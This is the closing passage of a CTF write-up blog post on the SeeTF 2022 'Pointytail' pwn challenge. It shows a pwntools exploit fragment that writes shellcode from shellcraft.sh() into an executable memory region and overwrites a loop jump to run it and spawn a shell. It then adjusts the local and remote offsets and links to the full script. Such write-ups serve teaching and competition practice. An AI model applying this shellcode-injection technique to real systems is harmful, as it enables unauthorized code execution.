<div class="code-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">sc = asm(shellcraft.sh())</span><br><span class="line">chunks, chunk_size = <span class="built_in">len</span>(sc), <span class="built_in">len</span>(sc)//<span class="number">6</span></span><br><span class="line">sc = [ sc[i:i+chunk_size] <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, chunks, chunk_size) ]</span><br><span class="line"><span class="built_in">print</span>(sc)</span><br><span class="line"></span><br><span class="line">target = rwxp</span><br><span class="line">target_jmp = rwxp+<span class="number">0x14b95</span></span><br><span class="line">arg1 = hex2do(p64(target-<span class="number">8</span>))</span><br><span class="line">arg2 = hex2do(p64(stack))</span><br><span class="line">p.sendline(<span class="string">f&quot;s <span class="subst">&#123;arg1&#125;</span> <span class="subst">&#123;arg2&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;\x90&#x27;</span>*<span class="number">8</span></span><br><span class="line">write1 = hex2do((payload))</span><br><span class="line">write2 = hex2do((payload))</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">f&quot;c <span class="subst">&#123;write1&#125;</span> <span class="subst">&#123;write2&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#Write Shellcode</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(sc),<span class="number">2</span>):</span><br><span class="line">	target = rwxp+((i+<span class="number">1</span>)*<span class="number">8</span>)</span><br><span class="line">	arg1 = hex2do(p64(target))</span><br><span class="line">	arg2 = hex2do(p64(stack))</span><br><span class="line">	p.sendline(<span class="string">f&quot;s <span class="subst">&#123;arg1&#125;</span> <span class="subst">&#123;arg2&#125;</span>&quot;</span>)</span><br><span class="line">	</span><br><span class="line">	write1 = hex2do(sc[i])</span><br><span class="line">	write2 = hex2do(sc[i+<span class="number">1</span>])</span><br><span class="line">	p.sendline(<span class="string">f&quot;c <span class="subst">&#123;write1&#125;</span> <span class="subst">&#123;write2&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">shell = (asm(<span class="string">f&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">	nop</span></span><br><span class="line"><span class="string">	nop</span></span><br><span class="line"><span class="string">	nop</span></span><br><span class="line"><span class="string">	nop</span></span><br><span class="line"><span class="string">	mov rbx, <span class="subst">&#123;rwxp&#125;</span></span></span><br><span class="line"><span class="string">	call rbx</span></span><br><span class="line"><span class="string">	&quot;&quot;&quot;</span></span><br><span class="line">	))</span><br><span class="line">chunks, chunk_size = <span class="built_in">len</span>(shell), <span class="built_in">len</span>(shell)//<span class="number">2</span></span><br><span class="line">shell = [ shell[i:i+chunk_size] <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, chunks, chunk_size) ]</span><br><span class="line"></span><br><span class="line"><span class="comment">#Overwrite jump while(1) to call rbx</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(shell),<span class="number">2</span>):</span><br><span class="line">	target = target_jmp</span><br><span class="line">	arg1 = hex2do(p64(target-<span class="number">8</span>))</span><br><span class="line">	arg2 = hex2do(p64(stack))</span><br><span class="line">	p.sendline(<span class="string">f&quot;s <span class="subst">&#123;arg1&#125;</span> <span class="subst">&#123;arg2&#125;</span>&quot;</span>)</span><br><span class="line">	</span><br><span class="line">	write1 = hex2do(shell[i])</span><br><span class="line">	write2 = hex2do(shell[i+<span class="number">1</span>])</span><br><span class="line">	p.sendline(<span class="string">f&quot;c <span class="subst">&#123;write1&#125;</span> <span class="subst">&#123;write2&#125;</span>&quot;</span>)</span><br></pre></td></tr></table></figure></div>
<p>Now with this we success gain the shell.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail8.png"
                      alt="pointytail"
                ></p>
<p>Next run it on nc service, we got some problem, because the environtment is different so the offset its different.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail9.png"
                      alt="pointytail"
                ><br>The offset on local is 0x9340 and on server is 0x92b0, with this just change the offset from 0xe9340 to 0xe92b0 to get correct rwxp address.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail10.png"
                      alt="pointytail"
                ></p>
<p>For full script see <a class="link"   target="_blank" rel="noopener" href="https://github.com/linz04/PWN-Writeup/blob/international/SEECTF/Pointytail/exploit.py" >Here<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p>

		</div>

		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/PWN/">#PWN</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2024/12/24/BackdoorCTF-2024-V8Box/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">BackdoorCTF 2024 - V8Box</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2021/11/29/2021-11-29-quickmaffs/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item">CyberJawara 2021 - Quickmaffs</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">SeeTF 2022 - Pointytail</div>
		<ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Pointy-Tail"><span class="nav-text">Pointy Tail</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Description"><span class="nav-text">Description</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Introduction"><span class="nav-text">Introduction</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#The-Bug"><span class="nav-text">The Bug</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Gain-Shell"><span class="nav-text">Gain Shell</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Linz</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        6 posts in total
                    </span>
                    
                </p>
            
        </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>





    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>






  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>